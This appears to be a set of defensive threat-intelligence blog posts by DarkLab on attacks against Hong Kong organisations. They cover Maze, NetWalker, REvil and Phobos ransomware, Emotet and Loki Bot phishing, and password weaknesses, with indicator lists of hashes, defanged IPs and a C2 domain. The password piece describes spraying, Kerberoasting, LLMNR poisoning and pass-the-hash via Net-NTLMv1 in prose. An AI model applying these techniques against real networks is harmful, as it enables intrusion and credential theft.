This year we helped two prominent Hong Kong retailers responding to network compromises by the Maze and Netwalker ransomware families. As it is increasingly common among ransomware operators, the retailers were threatened with data leaks on top of the data-encryption coercion. For retailers that process a significant amount of customers’ data, a data leak can present significant reputational and regulatory concerns, not to mention the operational impact that a widespread systems’ encryption can cause.

As we previously reported, ransomware operators often exploit known vulnerabilities in victims’ external IT estates (including for SSLVPN appliances), and exposed remote access services like RDP. However, large scale phishing campaigns like those of Emotet can also result in ransomware deployment. A specialist news outlet recently highlighted how most malware infections – even from unknown or low level variants – should be treated as potential ransomware incidents due to the growing popularity of initial access brokers malware services.

Business email compromise remains a concern

DarkLab also observed companies in the retail sectors becoming victim of another widespread threat, business email compromise. The international supply chain Hong Kong retailers rely on makes them a target for fraudsters looking to impersonate distant third parties to misappropriate funds. As working from home arrangements are becoming more prevalent, fraudsters are also looking to hijack communications between two employees in the same territory. The lack of physical interactions between employees makes email fraud easier.

To do that, fraudsters adopt ingenious social engineering techniques. These include passively monitoring email exchanges from a compromised email account while only modifying a few selected terms – like bank account details. This can lead to employees not realising their communications have been compromised until it is too late.

Strict rules for unusual bank transfers, as well as good email security hygiene can help prevent, or at least detect, these kinds of incidents.

Opportunistic attacks are more than a nuance

Some attacks can be less sophisticated than others but still require lengthy and cumbersome responses. For instance, DarkLab is aware of a retailer operating in Hong Kong that was recently infected in a likely automated fashion by a self-spreading crypto miner. The malware exploited an exposed RDP server, but was quickly detected by the victim’s security system. Nonetheless, time and resources had to be spent to conduct a thorough systems audit to ascertain the extent of the intrusion.

Similarly, data breaches can expose large amount of customer data and pose a significant threat despite the perceived lack of attackers’ sophistication. In September, a threat actor on a popular hacking forum released almost 3 million customer records from an online hospitality company with operations in Hong Kong, Singapore and Malaysia.[1] Although technical details of the breach are unclear, similar incidents often see criminals exploiting relatively unsophisticated techniques like SQL injections and exploitations of known vulnerabilities.

A thorough review of your online footprint and implementation of basic cyber security hygiene can help prevent such opportunistic attacks.

Conclusion and mitigation

The current situation of the COVID-19 pandemic affecting the globe has led to an uptick in cybercrime across all sectors. However, the ongoing sales and the coming Christmas season are likely to see retailers particularly targeted. Healthcare restrictions are forcing customers to rely on e-commerce platforms for purchasing products of all kinds.

With the holiday season coming into full swing, the amount of online purchases will likely to be at an all-time high. While there are clear opportunities for retailers to enjoy returns on a digital-focused business model, threat actors are also looking to exploit above mentioned techniques for their own malicious purposes.

Based on DarkLab’s experience in helping retail clients respond to network intrusions and uplift their security posture, we recommend organisations to:

  • Enforce Multifactor Authentication on all remote access services, including VPN, RDP and cloud environments.
  • Ensure ongoing visibility over all external-facing assets, and conduct regular vulnerability scan on external IP addresses.
  • Ensure mail filtering in place to block inbound email that fails SPF, DKIM, or DMARC checking.
  • Conduct regular security review of 3rd party code running on sensitive web pages like check out pages.
  • Enforce Content Security Policy to regularly review what domains can access your site and what resources they are allowed to load. This can help avoid Magecart exfiltrating customers’ data from your site.
  • Consider adopting compliance as code to ensure breaches of pre-established security measures are automatically detected and stopped.

Researching Emotet in Hong Kong

How spam campaigns can threaten regional transport hubs

Emotet is among the most widespread cybercriminal campaigns to date. Originally developed as a banking trojan to steal victims’ banking credentials, it eventually evolved in a vehicle to spread third party malware via large spam campaigns. Emotet developers have been collaborating for months with those of Trickbot and Qakbot to deliver ransomware, which means that an Emotet infection would likely lead to widespread system unavailability.

The most recent wave of Emotet emerged in July, and in September it was reportedly sending large amount of spam emails to Japan and New Zealand, among other target countries.  

DarkLab researchers found evidence that between August and September Emotet also targeted organisations in Hong Kong, a region previously unreported to be affected by this threat.

According to phishing emails uploaded to a popular malware repository, organisations in the retail, transport, and telecommunications sectors were among Emotet’s targets, although more companies are likely to have received their malicious emails.

Among the targets identified, particularly worrying is the presence of Hong Kong’s main airport. The organisation was very likely not compromised, or they would not have uploaded the phishing email to a malware repository, but as Emotet often leads to ransomware, a successful infection would have likely had serious impact on one of the largest airports in Asia Pacific.

Figure 1 – screenshot of Emotet phishing email to a Hong Kong victim

Attack chain analysis

DarkLab analysts observed that the emails were sent by Emotet’s epoch2 botnet, abusing or spoofing previously compromised organisations in other countries. The phishing emails contain MS Word attachments with relatively generic filenames such as invoice.doc and MJ-1759 report.doc. Upon opening the document, the user is enticed to click an enable content button, a standard technique to activate malicious macros.

Figure 2 – screenshot of MJ-1759 report.doc (MD5:e1b8b7b710a639b0697a5f3b5e6a00bb)

The heavily obfuscated malicious macros then load a base64-encoded Powershell script into memory, which is used to download an executable from one of seven hardcoded URLs. The use of multiple dropper sites is to ensure successful malware delivery even if one or more malicious sites are taken down

Figure 3 – decoded and partially deobfuscated powershell script reveals the dropper URLs (highlighted)

This first stage payload, which can have different names in different samples analysed, is by default saved in %TEMP%\APPDATA or USERFOLDER. When the first stage executable is run it gains persistence by copying itself in the system root folder with a different name, and by modifying registries entries to ensure that the process is run every time the endpoint boots up. The new executable in system root is the actual Emotet payload, named kbdrost.exe, and reaches out to a command and control server via a HTTP post request.

Figure 4 – Emotet’s connection to remote C2 IP following successful infection

According to previously observed behaviour, Emotet will eventually drop the Trickbot or Qakbot trojans, which will then deliver the Ryuk or Prolock ransomware respectively.

Emotet’s large spam campaigns and relatively sophisticated delivery mechanisms are likely to continue to pose a threat to companies in Asia Pacific in the foreseeable future. DarkLab’s discovery of Emotet’s targeting of Hong Kong organisations shows how companies in the region should maintain awareness of global threat trends to ensure effective network defences and a proactive approach to cyber security.

Indicators of Compromise

The following IOCs relate to the samples analysed, include the hardcoded C2 IP addresses. However, Emotet’s attack infrastructure changes rapidly. We suggest readers to refer to Cryptolaemus’ daily IOC lists for an updated and comprehensive overview of Emotet’s infrastructure.

FilenameSHA-256 Hash
MJ-1759 report.doc5a378819ab9e17bc93ed9c3d01b31f2b1ff6c39cb3cbaff66933fe096a527450
Executable dropper URLs

C2 IPs

A tale of two hacks

A case study in structured intelligence analysis

In recent weeks DarkLab helped a large international company conduct a threat hunting exercise in their infrastructure following a network breach.

The initial investigations revealed that threat actors infiltrated the network using legitimate and likely stolen credentials on a Citrix server hosted in a European subordinate of our client. From there, however, the DarkLab team discovered two sets of activities. One led to the exfiltration of large amount of data, another one to the deployment of the REvil ransomware, also known as Sodinokibi. We previously reported on how ransomware operators are increasingly stealing data from their victims to threaten its release if their ransom demands are not met. It seemed therefore possible that the two sets of malicious activities were carried by the same threat actor.

Indeed, the initial entry point was the same, and the stolen data was uploaded to Mega, a popular data hosting site previously used by REvil operators. However, some other aspects of the malicious actions did not add up. For instance, data was exfiltrated weeks after the ransomware was deployed, which would have been inconsistent with previously observed tactics, techniques and procedures (TTPs) of ransomware operators. Also, the activities that led to ransomware deployment and those that ended up stealing data exploited commonly used but different toolsets. While in one incident Cobalt Strike was used as the attacking tool on day one, the other set of activities involved PSExec the day after. Since Cobalt Strike has a Psexec built-in we started doubting whether the two incidents were carried out by the same hacker.

Assessing pieces of conflicting evidence can be messy and potentially lead to the wrong conclusion. In order to analyse existing evidence in an unbiased and objective manner, DarkLab analysts resolved to employ a traditional intelligence analysis technique used by intelligence professionals since the 1960s. Despite its age, the Analysis of Competing Hypothesis (ACH) remains a useful framework to answer difficult questions in a way that removes analyst’s potential biases or misconceptions.

Our analysts created a table like the below, where pieces of evidence are given a credibility and relevance score, before evaluating their consistency with different hypothesis. The hypothesis with the highest score is considered the most likely.

In our case we considered the following hypothesis:

H1: Incident 1 and 2 were carried out by the same attacker

H2: Incident 1 and 2 were carried out by two different attackers

H3 Incident 1 and 2 were carried out by more than two attackers

Fig 1 – ACH table

By considering the evidence collected as consistent (C), not applicable (N), or inconsistent (I) with each of the hypothesis, a final score is calculated. H2 scored the highest
indicating it was clearly the most likely hypothesis. This suggested that indeed different threat actors were separately involved in the ransomware deployment and data exfiltration.

In this way, we were able to use a fact-based, objective analysis of the available intelligence to our advantage in a live threat hunting exercise. In particular, our threat hunting team was able to treat the incidents as separates, with significant implications for their efforts in detecting and mitigating the breaches.

Further details on the incidents

Our forensic investigation identified how the ransomware attack lasted a total of five days, while the threat actor that stole the data was able to remain undetected in the network for almost six weeks. In both cases, the number of hosts compromised was significant and threat actors were able to move across different countries’ networks without being detected.

The REvil operator used the legitimate remote access solution AnyDesk as a backdoor, and eventually deployed the ransomware to over 1000 servers and workstations in Hong Kong and the UK. Ironically, the ransomware interfered with the callbacks the second attacker had already established on 10 machines. All their established call-back connections on the compromised servers were gone after the ransomware attack. They were therefore forced to restart from the initial compromised Citrix server in the UK. From there, they used Cobalt Strike for lateral movement and privilege escalation on multiple accounts in Hong Kong, US, and India. This second attacker collected hundreds of gigabytes of data from different servers, staged them internally, comprossed them, and eventually uploaded them to a Mega cloud server.


The presence of two separate attackers within the network of a large conglomerate indicates the significant challenges that large organisations with tens of thousands of endpoints can face. Deploying standard policies on such a large estate can be challenging, but we strongly suggest organisations to:

  • Enable Multi-Factor Authentication (MFA) for all remote access
  • Enforce strong password policies, proper Active Directory-based mechanisms, or a managed password solution to protect Domain Administrators account
  • Tighten cloud file storage usage, some solutions offer built-in micro segmentations that can help prevent attackers accessing your data
  • Consider employing Managed Detection and Response services to automatically and proactively mitigate threats in a 24/7 manner

Indicators of Compromise


payload.txtf5dd8644b011a6ecaf405ee9bc5c6852Cobalt Strike implant callback
beac.exe500286eaf9eb11b34eb413bb0df5543bCobalt Strike implant callback


82.31.145[.]121Infiltration IP
94.7.101[.]89Infiltration IP
158.174.247[.]194Infiltration IP
212.80.217[.]174Call back IP
51.83.165[.]21Call back IP
fairyschool[.]artC2 domain for baec.exe

You Shall Not Pass(words)

A red teamer’s perspective on what is wrong with passwords, and how to make it right

“Your passwords are weak” is one of the most common observations that we find ourselves making in our red teaming work. It is often surprising to organisations. Our clients’ passwords meet their formal complexity requirements. However, a password compliant to password policies is not necessarily a strong password. Password policies are usually designed with respect to the available compliance features in Windows. Some of these, like the 20 years old Windows’ Password Complexity, are quite updated.

In the course of one red team engagement our offensive security professionals can encounter hundreds of weak passwords. Weak passwords allow hackers to infiltrate your network and to move laterally in your environment. In this article, we draw from our offensive security experience to illustrate common misconception about passwords, and what companies should do to enforce stronger ones.

Beyond a lengthy and repetitive approach

In 2017 the NIST Special Publication SP800-63-3 introduced an interesting concept, that complexity requirements and expiry dates are not necessary, and not effective, for memorised secrets like passwords.

This was published at a time where most security control guidelines still required corporate users to use complex passwords and change them periodically, sometimes as often as every month. Instead, NIST encouraged a new approach including using multi-factor authentication solutions wherever possible and checking passwords against dictionary lists, among others.

Microsoft has since implemented some of these suggestions within the Windows platform. From our experience, however, most organisations in Hong Kong and Asia Pacific still lack a full understanding of some of these technologies to apply them effectively. The first misconception is that short passwords and PINs are weak. This is an over-simplification of how security works. The strength of a password should be assessed alongside its potential exploitation techniques.

Length does not always matter

One example is the use of Windows PINs compared to Windows domain passwords. Their requirements should be different because their potential attack vectors are as well. While hashes of Windows passwords can be downloaded and bruteforced offline, PINs cannot. Also, PINs have a much smaller attack surface compared to a domain password.

Windows domain passwords are one of the most common ways to gain access to a target network and its resources in a Windows environment. Domain passwords must be complex because attackers can abuse each one of them at different points of a corporate network. For instance, during red team engagements we can typically conduct password spraying with a standard set of user passwords within the local network and sometimes against remote applications, such as Outlook Web Access. We can also leverage Windows functionalities to obtain password hashes, via Kerberoasting or LLMNR poisoning for instance, which we can then to decrypt by cracking them offline. Strong and complex passwords would be much harder, if not impossible, to crack and would be harder to guess in a password spraying attack.

On the contrary, a Windows PIN can only be used on a single Windows machine, and an attacker can be further slowed down by introducing a delay between failed attempts.

Does a long, complex PIN make sense in this case? A 12-character, complex Windows PIN which can only be entered (and therefore attempted by the attacker) on a physical machine is unnecessary. From a red teamer point of view, a 6- to 8-character PIN is sufficient for a Windows PIN environment.

While it takes only a few hours to bruteforce a hashed 8-character Windows password offline, it takes much longer to test potential PINs on premises on a Windows machine. Also, bruteforcing PIN is not practical because the TPM Anti-Hammering protection locks a PIN attempts for 24 hours after 32 wrong attempts. This is summarised in the graph below.

Therefore a Windows PIN, or any PIN tied to hardware devices like iOS devices:

Does not require length and complexity

Does not require frequent expiry dates

Bypassing passwords

There are other authentication solutions other than passwords and PINs. Some organisations use smartcards, which seem like an elegant solution. In effect, the “PIN” that users enter would unlock the content of the smartcard, which can subsequently be used to connect to domain resources.

The problem often lies with the implementation of these solutions. In most situation, the smartcard stores a NTLM hash that is unlocked by the user’s PIN. This NTLM hash is randomly generated and complex enough for it not to be cracked into cleartext format. However, the system never changes this NTLM hash which can therefore be used directly to authenticate to Windows domain resources via pass-the-hash. If this NTLM hash is compromised, it would allow persistent access by attackers for a long time.

For us red teamers, one way to get these hashes is via Net-NTLMv1 hashes that some organisations still use. NetLMv1 can be directly converted into NTLM, which can then be used for pass-the-hash activities. This is because Net-NTLMv1 relies on 3 separate DES encryptions, which can be cracked separately back into NTLM format due to their weak encryption algorithm.

Another solution to move beyond password authentication is Windows Hello for Business. This Microsoft solution would supposedly allow businesses to move into a password-less environment. In a nutshell, a Windows Hello for Business PIN or biometric authentication would unlock the credentials (stored as certificates or keys) within the PC. We have yet to see widespread adoption Windows Hello for Business though.

Trust but verify

For those of us that must still rely on windows domain passwords, an important addition would be to introduce a password checking process. Most organisations do this via complexity requirements built-in to Windows.

As our reader may have guessed by now, complexity requirements are not enough. Consider the following “strong” passwords that meets Windows complexity policies:

  • P@ssw0rd
  • P@$$w0rd
  • Username!July
  • July!2020

From an IT security controls or compliance person, these are good passwords that meet policy requirements. From a red teamer perspective, these are all very weak passwords.

From our experience, at least 70% of all passwords within an organisation are similarly weak passwords that nonetheless comply with password policies.

The problem could be addressed by increasing the complexity required by password policies. However, this would likely increase users’ frustration while not necessarily making life harder for an attacker.

To ensure that systems are secured with stronger passwords, organisations need a solution that takes into considerations real world scenarios. Consider a password audit exercise, which checks your users’ new and existing passwords against a list of:  

  • Known passwords from leaked data breaches
  • Most commonly used passwords
  • Passwords that contain references to the organisation, username, etc.

Fortunately for Windows users, such a functionality is provided with an Azure AD subscription.

For companies that do not use Azure AD, DarkLab also offers a solution with similar functionalities that relies on password blacklists from our Threat Intelligence practice.

Whatever solutions you choose, remember the key concepts we went through:

  • Longer is not always better
  • PINs are better than passwords
  • Passwordless solutions must be correctly implemented
  • Perform a password audit by checking your passwords against a blacklist, without adding unnecessary complexity!

Phishing Vessels

Loki Bot campaign targets maritime industry

DarkLab intelligence analysts detected a Loki Bot phishing campaign targeting the maritime and engineering sectors in Europe, Asia and the US from spoofed email addresses of legitimate organisations in Asia.

Figure 1 – Countries of origin of phishing recipients (blue) and legitimate organisations’ spoofed addresses (red)

Recipients of phishing emails – hard to see in the map above – were also located in Singapore.

The earliest phishing email detected dates back to October 2019. However, our previous research indicates that this threat actor is using maritime themes in their phishing campaigns since at least 2018, and is linked to other malware families including Pony.

The 2019 email was sent from a likely compromised subdomain of an Indonesian company and contained a malicious archive (.rar) attachment purportedly pertaining to a purchase order, a common theme of spam emails.

Since then, the actor behind the campaign refocused their phishing lures by spoofing emails of legitimate organisations linked to the maritime industry, and by referring to vessels and other naval themes in their emails.

Figure 2 – Example of phishing email spoofing a Singapore-based shipping company

Figure 3 – Example of phishing email sent to a Switzerland-based maritime consultancy

Some phishing emails showed a good knowledge of the shipping industry, including believable details of existing ships and ports locations.

Figure 4 – Example of phishing email sent to a Japanese shipping company

Figure 4 – Example of phishing email sent to an Italian engineering contractor, purporting to be from a Chinese port authority

For instance, both vessels mentioned in the email above, Glovis Crown and Glovis Splendor, are 200m long cargo ships registered in the Marshall Islands. It remains unclear how criminals managed to obtain such details, although it seems likely that they derive from previously hijacked communications of potentially unrelated victims.

This second wave of phishing emails has been active between February and late June 2020, suggesting the campaign is likely still active.

Phishing emails switched to a malicious Microsoft Excel (.xlsx) attachment containing an exploit for CVE-2017-11882. This vulnerability in Microsoft Equation Editor lets attackers run remote code on a vulnerable machine when the victim opens a document. The exploit has been actively used by multiple cybercriminal groups due to the level of access it grants to the victim machine and the lack of user interaction needed.

Figure 5 – Screenshot of malicious xlsx attachment to email in Figure 4 [MD5: e7bb1284bf0e723b47435b0f70504b3f]

The malicious documents are downloaders for Loki Bot, an information stealer first seen in 2015. The malicious payloads observed, and additional ones found by pivoting on the attack infrastructure, are downloaded from duckdns.org subdomains likely created with domain generation algorithms (DGA).

The payload, Loki Bot, can steal credentials from browsers and email clients, among other programs, and has keylogging capabilities. The malware also sends identifying information about the victim’s hosts to a C2 to inform threat actors of the successful infection.

The current Loki Bot campaign highlights the ongoing threat of commodity malware and widespread phishing to organisations in the maritime and engineering sectors. Although the campaign exploits well-known threat vectors, lack of widespread adoption of anti-spoofing technologies like SPF and DMARC, or their incorrect implementation,  means that criminals can continue sending credible phishing emails apparently from legitimate domains.

Indicators of Compromise

Emails Sender’s IP


Downloader Domains





















Crypt ‘n’ Leak

New ransomware trend exploits vulnerability in Hong Kong’s VPNs

The fast pace of criminals’ innovation is an ever-recurring theme in cyber security. When the cybercriminal underground economy is particularly saturated, threat actors will likely be driven to explore new ways to differentiate their offering in the illicit cybercriminal market and increase revenue. This is what we are currently observing among ransomware operators. Many ransomware variants have been released in recent years. In the last several months, however, a smaller group of ransomware-as-a-service providers emerged with new a tactic to extort their victims.

DarkLab’s Threat Intelligence team is currently tracking multiple ransomware groups that, in addition to encrypting victims’ data, also steal sensitive files and threaten their public release if ransom demands are not met. The extortionists’ goal is to apply additional pressure on victims by threatening reputational damage and potential regulatory fines if sensitive data is leaked, on top of hindering systems availability.

DarkLab incident response team has observed multiple such incidents affecting Hong Kong organisations, highlighting how ransomware leak attacks are a significant and current threat for companies in the region as well as globally. DarkLab has experience in dealing with Maze and NetWalker ransomware attacks in Hong Kong. This article aims to first shed light on each malware’s background, and then to discuss some of the tactics, techniques, and procedures (TTPs) we observed in our incident response investigations.

The RaaS model and its implications

Maze and NetWalker ransomware variants are developed by a core group of cybercriminals and then leased to other criminal operators, called affiliates, on deep and dark web forums. This model is usually referred to as ransomware-as-a-service (RaaS), where operators and developers share profits in an agreed percentage.

RaaS means that different operators of the same ransomware group can target multiple companies at the same time, regardless of their size or geographical location. Ransomware operators are independent actors, so they may differ in the attack tactics exploited. This makes the job of network defenders more challenging because of the larger set of potential tactics, techniques, and procedures (TTPs) to mitigate.

Some RaaS developers, like those of NetWalker, only accept affiliates with proven technical skills and existing access to multiple corporate networks. Stricter cybercriminal candidate screening is leading to an increase in targeted ransomware attacks exploiting external network systems. Exposed remote desktop protocol (RDP) and vulnerable internet-facing services are increasingly more likely entry points than untargeted phishing emails.

The rise of crypt and leak

Since the end 2019, some ransomware groups have begun threatening to release sensitive victim’s data if their ransomware demand are not met. Maze went a step further and set up a dedicated website to publicly shame victims and leak data. More groups, including NetWalker, are now maintaining their own leak websites on the clearnet or on tor hidden services. DarkLab is currently tracking 13 ransomware leak websites, highlighting the rapidly increasing scale of this crypt and leak trend.

This new pressure tactic by ransomware operators has significant implications for companies. Previously, an efficient back-up policy would potentially guarantee a timely recovery from ransomware attacks. Now that ransomware groups also leak data, back-ups are not enough anymore. Organisations must ensure that sound cyber security hygiene is maintained at all times to prevent a ransomware intrusion from taking place at all.


Maze ransomware appeared in May 2019, but it began leaking victim’s data only in 2020. The group maintains two sites, one to publish victim data (see figure 1), the other to communicate with its victims and let them decrypt some test files (see figure 2). Both have a back-up tor hidden service counterpart to avoid take down by law enforcement.

Figure 1 – redacted screenshot of Maze ransomware leak site

Figure 2 – Screenshot of Maze ransomware chat site

Figure 3 – Geography of Maze’s victims posted on their site

Figure 4 – Sectorial breakdown of Maze’s victims posted on their site


NetWalker ransomware is based on a previous variant called Mailto and was rebranded in its current name in March 2020, despite little change in its code. The developers of NetWalker recruit affiliates on Russian-language cybercriminal forums and particularly look for individuals with network intrusion experience. The group has allegedly been very successful since its inception. NetWalker developers claimed to have gained millions of US dollars since March, although it remains unclear whether this is just an exaggeration to attract more affiliates to their program or not.

NetWalker also operates a website that lists their victims and leaks their data. We noticed that the group behind NetWalker selectively deletes victims’ entries from their website overtime, so the range of targeted organisations is likely more extensive than that presented in the graphs below.

Figure 5 – Redacted screenshot of NetWalker ransomware leak site

Figure 6 – Geographical breakdown of NetWalker’s victims posted on their site, more have likely been targeted and not posted online or deleted from existing victims’ list

Figure 7 – Sectorial breakdown of NetWalker’s victims posted on their site, more sectors have likely been targeted

Observed tactics, techniques, and procedures

DarkLab incident response investigations found that operators of both Maze and Ransomware exploited a known Pulse Secure VPN vulnerability – CVE-2019-11510 – to gain initial access to victims in Hong Kong. The same vulnerability has been exploited by multiple ransomware groups against other high profile targets, including by Sodinokibi against Travelex in January.

In both cases, the remote access technology SSLVPN was Active Directory (AD) authenticated, giving attackers a legitimate network account early on in their intrusion. Once inside the victim’s network, the attackers would conduct enumeration and other reconnaissance activities by, for instance, searching for password files in share folders. The attackers will also actively look for idle and vulnerable servers with intentions to expand their foothold.

During our investigations we found that both intruders used common hacking tools, although with some differences. Tools observed include windows administration tools like psexec, open source tools for lateral movement like crackmapexec, PowerShell versions of Mimikatz and PowerView for credential theft, further enumeration and privilege escalation, as well as off-the-shelf network scanners. 

The Maze and NetWalker operators eventually managed to obtain access to administrator accounts, which allowed them in both cases to disable anti-virus solutions on network end points. Similarly, creation of new domain administrator accounts allowed them persistence on the network. 

From such privileged positions the operators staged malware and other required artefacts on accessible locations in the victims’ networks, such as shared folders – for NetWalker – and NETLOGON folders – for Maze. We suspect that in both incidents scripts were used to automatically spread the ransomware in the network.

In the case of Maze, the deployment script would also disable endpoints’ protection software, and enable services, such as Windows Remote Management, that would allow re-entry. Maze operators also abused group policy objects (GPOs) to weaken their endpoint defences by changing configurations, and to redeploy the malware to new machines. The latter would ensure that the ransomware would also spread to endpoints after they shut down or if they joined the network at a later time.


The double extortion of crypt and leak groups and the growing trend of targeted attacks against external network infrastructure makes ransomware leaks one of the most significant threats to companies, regardless of sectors. The recent targeting of Hong Kong organisations by Maze and NetWalker also reaffirms how the SAR’s threat landscape is closely associated with threat trends worldwide.

Companies in Hong Kong should therefore adopt a proactive approach to review their security posture and avoid targeted network intrusions in the first place. Presence of timely back-ups can help restore system availability but it is not an effective mitigation against the increasing threat of ransomware data leak. Organisations should also focus on maintaining situational awareness on developments in the global threat landscape, as threats to companies abroad are likely to quickly become threats to Hong Kong organisations too.

Indicators of Compromise

HashFile nameDescription
c45ebccb7dc2bbc34c51c82c3eba6448apply.ps1Generates GPO package to disable AV, settings
16b5ddd25bb610270e52c1663931ef4csystem.dllMaze ransowmare
0e7d5d16e03393605f5f4862f1b9cc37crackmapexec.exeLateral movement tool
d6a246a98a0387e2a5f9d95ddd8ae164syspool.exeLightweight network scanner
696bb8648eceaa187cbc1f06205a23cecity.exeNetWalker ransomware
84ddf23d4307b1a9989352f4845d0edecity.ps1NetWalker PowerShell script

Phobos ransomware

Incidents affecting Hong Kong organisations

In the last two months DarkLab Incident Response and Threat Intelligence teams observed multiple incidents in Hong Kong involving the Phobos ransomware variant.

There is no explicit indications that these incidents are part of a campaign targeting Hong Kong. Rather, they are likely due to Phobos’ prevalence in the cybercriminal underground. Nonetheless, the similarities in observed tactics, techniques and procedures (TTPs), and in the ransomware deployed prompted us to release this alert to help companies improve their timely detection and response to this threat.

Intrusions analysis

Phobos shares many similarities with the Dharma ransomware, and has been sold as  ransomware-as-a-service on the cybercriminal underground since at least December 2018. This means that even low skilled threat actors can rent the malware from its developers and spread it via whatever means they have access to. 

According to our DarkLab’s incident investigations, exploitation of remote desktop protocol (RDP) servers and their credentials are the most common infection vectors. In particular, we observed RDP bruteforcing and exploitation of weak password policies as the most frequent attack vectors. Such TTPs match previously reported instances of Phobos intrusions worldwide.

Once inside the victims’ network, we have seen criminals creating a local account with netplwiz, deploying a malicious network share scanner called 5-NS new.exe, and deleting event logs prior to executing the main payload.

Several hours after the initial intrusion threat actors triggered the ransomware in the form of a malicious executable. Other than encrypting the files, the ransomware also tampered with infected hosts to disable the firewall and other security configurations.


Attackers did not employ particularly sophisticated tradecraft and PwC was able to help clients contain the incidents quickly. Nonetheless, the intrusions impaired systems availability and created operational disruption among victim companies. This can be particularly damaging when most organisations’ staff connect remotely to the corporate network due to the COVID-19 pandemic.


To protect against ransomware incidents via RDP exploitation, DarkLab recommends companies to:

  • Ensure visibility over public-facing RDP servers via external scans
  • Limit exposure of public-facing systems whenever possible
  • Enforce use of multi-factor authentication for remote access, particularly RDP
  • Ensure your organisation has and follows an effective back-up policy
File NameMD5Description
20.09.2019Taskmgr.exeb8351ba02dbce02292a01a6e85112e2bPhobos ransomware
Mouse Lock_v22.exefc9c80e1767e1266056b1b2c89a74ce5Blocks mouse cursor on screen
5-NS new.exe597de376b1f80c06d501415dd973dcecNetwork shares scanner

Cyber threats to Hong Kong

An incident response perspective

In the last two years, DarkLab has helped clients respond to, and recover from, numerous network intrusions. Our clients span a variety of sectors in Hong Kong and Macau, including financial services, real estate, telecommunications, and aviation, among others. The organisations we helped also varied greatly in size and cyber security maturity. Some employed just a handful of personnel with no dedicated security function, while others were large international organisations with an established CISO and security teams.

This range of incident response experience means that DarkLab is in a unique position to identify cyber threats to Hong Kong companies across multiple sectors. In this article, we share some of the threat trends we have observed first hand, and highlight effective mitigation methods companies can implement to thwart them.

Common attacks against companies in Hong Kong

In 2018, we were called in to help investigate a significant number of business email compromise (BEC) frauds against financial services companies. BEC frauds see threat actors sending emails to employees, often in the finance department, to instruct them to direct funds to a bank account that scammers control. For the fraud to work, the email needs to appear to originate from an internal, trusted email account.

While email spoofing is the simplest option for threat actors, in most of the incidents we observed threat actors instead directly compromised an email account. This allowed them to monitor their victim’s incoming emails and hijack an email thread to grant their fraudulent request greater credibility. While BEC scammers usually spent no more than a couple of days in their victim’s accounts, we saw one incident where their presence remained undetected for almost a week.

In 2019, the most common type of attacks were ransomware and cryptomining. Cryptomining incidents were mostly caused by automated botnets. Intrusions were often detected promptly by victims due to the unusually high CPU usage required to generate cryptocurrency.

Ransomware attacks instead showed a higher degree of stealth and manual lateral movement. For instance, in a ransomware intrusion attackers operated in the infected network only outside standard office hours. By also exploiting living-off-the-land techniques intruders managed to remain unnoticed until the encryption routine was activated some 20 days later.

Threat intelligence suggests that last year ransomware and cryptomining threats were on the rise globally, showing how threats to Hong Kong closely follow global threat trends.

Main initial attack vectors exploited

The initial attack vectors for most incidents we investigated were abuse of internet-facing infrastructure, often exploiting brute-force attacks or stolen credentials to access servers with enabled remote desktop protocol (RDP) and secure shell (SSH).

For instance, a client in the shipping industry had ten servers infected by the Anacron cryptomining malware. Upon investigation, we discovered attempted bruteforce attacks against the same SSH server for almost a month, suggesting automated botnet activity. Once logged in, the malware spread to 10 additional servers that shared the same password as the infected web server.

Ransomware infections that initiated on a public-facing RDP server were also relatively common. For instance, we responded to one such incident involving the Dharma/Crysis ransomware that was affecting a real estate development company.

In at least one case, however, a publicly available exploit enabled a ransomware attack against a company in the professional services sector. Attackers exploited a known vulnerability in Windows IIS (CVE-2017-7269) to gain initial access to a server used for testing, which was left exposed to the internet. After stealing multiple IT user accounts with the highest privileges, the attacker compromised and encrypted 62 Windows servers causing significant business disruption.

Espionage intrusions against organisations in Hong Kong

Although less numerous, we also witnessed prolonged and organised network intrusions against companies in Hong Kong carried out by skilled threat actors.

In an incident in late 2019, we responded to a supply-chain compromise carried out by a likely espionage group against a Hong Kong client in the aviation sector. The attacker targeted a subsidiary of the client by exploiting an unpatched firewall vulnerability to obtain valid VPN credentials. Once inside the victim’s network, the threat actor conducted extensive reconnaissance and staged various tools on internal servers. Tools included the credential dumping Mimikatz, NBTScan for network scanning, and PSExec for lateral movement.

After more than a month in the subsidiary’s network, the threat actor exploited the trusted connection with the main organisation’s network to move across. Fortunately, the intrusion in the main organisation’s network was detected in time and it did not result in exfiltration of data. Nonetheless, we saw similar tactics, techniques and procedures used against another Hong Kong critical national infrastructure company in 2018. This suggests that espionage threat actors continue to pose a threat to Hong Kong organisations in strategic sectors.


Despite the range of potential threats to companies in Hong Kong, cyber security best practices and common hygiene methods can help deter a significant portion of the cyber attacks we observed.

To improve your organisation’s resilience to cyber attacks we suggest to:

  • Enforce the use of multi-factor authentication for remote access
  • Restrict domain admin rights
  • Limit exposure of public-facing systems
  • Ensure that best practices for network segmentation are observed
  • Conduct regular security awareness training for IT and non-IT staff
  • Perform regular cyber attack simulations to ensure resiliency
  • Consider establish or outsource a Security Operation Centre (SOC) for security log monitoring and threat hunting
  • Ingest timely Cyber Threat Intelligence feeds and reporting for proactive defense against upcoming threats